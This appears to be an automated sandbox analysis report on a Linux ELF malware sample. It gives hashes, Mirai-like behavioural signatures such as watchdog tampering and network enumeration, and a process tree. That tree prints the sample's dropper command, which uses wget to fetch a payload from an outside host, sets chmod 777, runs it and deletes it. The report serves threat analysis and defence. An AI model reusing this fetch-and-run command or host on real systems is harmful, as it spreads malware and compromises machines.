Analysis

  • max time kernel
    146s
  • max time network
    140s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2004-amd64-20240221-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
  • submitted
    02/04/2024, 01:17

General

  • Target

    a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf

  • Size

    114KB

  • MD5

    535e42bda70b4c58e32e5f244ee715f1

  • SHA1

    70150ad2d0028bf5fbac7781aa18665102b6070e

  • SHA256

    a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf

  • SHA512

    1d907628b4333ca1e653fc7e73e6ecbb5cb2307bb060169b4fcee62e9e6d5c171101e93d3afeea9deafd3bea1820c3b3d1c78317d7e0acb49b415c4a5b2e62cf

  • SSDEEP

    3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJioud2yd1m7FnVqfJXoebNb:SKo/O8qtUbKXbm7FnVqfJXoebNb

Score
7/10

Malware Config

Signatures

  • Changes its process name (1 IoCs)
  • Executes dropped EXE (1 IoCs)
  • Modifies Watchdog functionality (1 TTPs, 2 IoCs)

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Reads system routing table (1 TTPs, 1 IoCs)

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration (1 TTPs, 1 IoCs)

    Uses contents of /proc filesystem to enumerate network settings.

  • Writes file to tmp directory (1 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
    /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
    1⤵
    • Changes its process name
    • Reads system routing table
    • Reads system network configuration
    PID:1458
    • /bin/sh
      /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      2⤵
      PID:1459
      • /usr/bin/wget
        wget -q http://gay.energy/.../vivid -O .....
        3⤵
        • Writes file to tmp directory
        PID:1466
      • /usr/bin/chmod
        chmod 777 .....
        3⤵
        PID:1481
      • /tmp/.....
        ./.....
        3⤵
        • Executes dropped EXE
        PID:1482
      • /bin/sh
        /bin/sh ./.....
        3⤵
        PID:1482
      • /usr/bin/rm
        rm -rf .....
        3⤵
        PID:1485

Network

MITRE ATT&CK Enterprise v15
